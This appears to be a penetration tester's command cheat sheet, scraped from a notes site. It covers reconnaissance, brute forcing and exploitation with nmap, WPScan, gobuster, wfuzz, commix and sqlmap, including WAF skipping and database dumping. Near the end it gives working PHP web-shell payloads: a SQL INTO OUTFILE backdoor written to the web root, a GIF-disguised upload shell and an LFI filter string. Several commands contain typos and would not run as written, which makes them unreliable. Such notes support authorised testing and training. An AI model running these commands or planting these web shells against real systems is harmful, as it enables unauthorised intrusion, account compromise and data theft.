Comman

Previousmy recon cheat-sheet NextPassive Enum

Last updated 2 years ago

=============================================== ====nmap==== nmap -sT -sV -p- -T4 $IP > scan1 nmap -p- --script=vuln $IP > scan2 ###HTTP-Methods nmap --script http-methods --script-args http-methods.url-path='/website' <target> =============================================== ===WPScan & SSL wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u ===WPScan Brute Forceing: wpscan --url $URL --disable-tls-checks -U users.txt -P /usr/share/wordlists/rockyou.txt =============================================== ===Nikto with SSL and Evasion nikto --host $IP -ssl -evasion 1 =============================================== ===dns_recon dnsrecon -d yourdoamin.com =============================================== ===gobuster directory gobuster dir -u $URL -w /opt/seclists/Discovery/Web-Content/raft-medium-directories.txt -l -k -t 30 ===gobuster files gobuster dir -u $URL -w /opt/seclists/Discovery/Web-Content/raft-medium-files.txt -l -k -t 30 ===gobuster for SubDomain brute forcing: gobuster dns -d domain.org -w /opt/seclists/Discovery/DNS/subdomains-top1million-0110000.txt -t 30 “just make sure any DNS name you find resolves to an in-scope address before you test it” =============================================== ===Extract IPs from a text files. grep -o ‘[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}’ nmapfile.txt =============================================== ===wfuzz XSS Fuzzing=== wfuzz -c -z file,/usr/share/wordlits/Fuzzing/XSS.txt “$URL” ===wfuzz wfuzz -c -z file,/usr/share/worlists/Fuzzing/command-injection.txt -d “doi=FUZZ” “$URL” ===wfuzz html_escape wfuzz -c -z file,/usr/share/wordlists/Fuzzing/yeah.txt “$URL” ===AUTHENTICATED FILE FUZZING: wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/raft-midium-files.txt --hc 404 -d “PARAM=value” “$URL” ===Fuzz Directories: wfuzz -c -z fil,/opt/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 “$URL” ===Fuzz Files: wfuzz -c -z fil,/opt/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 “$URL” | LARGE WORDS: wfuzz -c -z file,/opt/seclists/Discovery/Web-content/raft-large-words.txt --hc 404 “$URL” | USERS: wfuzz -c- z file,/opt/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403 “$URL” =============================================== ===Command Injection with commix, ssl, waf, random agent. commix --url “https://sepermegaleetultradomain.com?parameter=” --level=3 --force-ssl --skip-waf --random-agent =============================================== ===SQL-Map sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique-T --force-ssl sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump /seclists/Fuzzing/alphanum-case.txt =============================================== ===Social Recon theharvester -d domain.org -l 500 -b google =============================================== ===Nmap HTTP-methods: nmap -p80 --script=http-methods $IP --script-args http-methods.url-path='/directory/goes/here' =============================================== ===smtp USER ENUM smtp-user-enum -M VRFY -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP smtp-user-enum -M EXPN -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP smtp-user-enum -M RCPT -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP =============================================== ===Command Execution Verification - [Ping check] tcpdump -i eth0 -c5 -icmp === #Check Network netdiscover /r 0.0.0.0/24 === #INTO OUTFILE D00R SELECT “<?php system($_GET['cmd']); ?>” into outfile “/var/www/WEROOT/backdoor.php”; === LFI? #PHP Filter Check php://filter/convert.base64-encode/resources= === UPLOAD IMAGE? GIF89a1 <?php system($_POST["cmd"]); ?>